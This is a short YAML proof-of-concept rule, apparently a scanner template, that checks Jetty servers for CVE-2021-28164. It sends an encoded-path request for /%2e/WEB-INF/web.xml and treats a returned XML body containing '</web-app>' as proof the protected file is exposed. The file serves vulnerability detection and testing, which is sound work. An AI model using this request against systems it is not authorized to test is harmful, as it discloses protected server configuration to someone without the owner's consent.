name: poc-yaml-jetty-cve-2021-28164
rules:
  - method: GET
    path: /%2e/WEB-INF/web.xml
    follow_redirects: false
    expression:
      response.status == 200 && response.content_type == "application/xml" && response.body.bcontains(b"</web-app>")
detail:
  author: Sup3rm4nx0x (https://github.com/Sup3rm4nx0x)
  links:
    - https://www.linuxlz.com/aqld/2309.html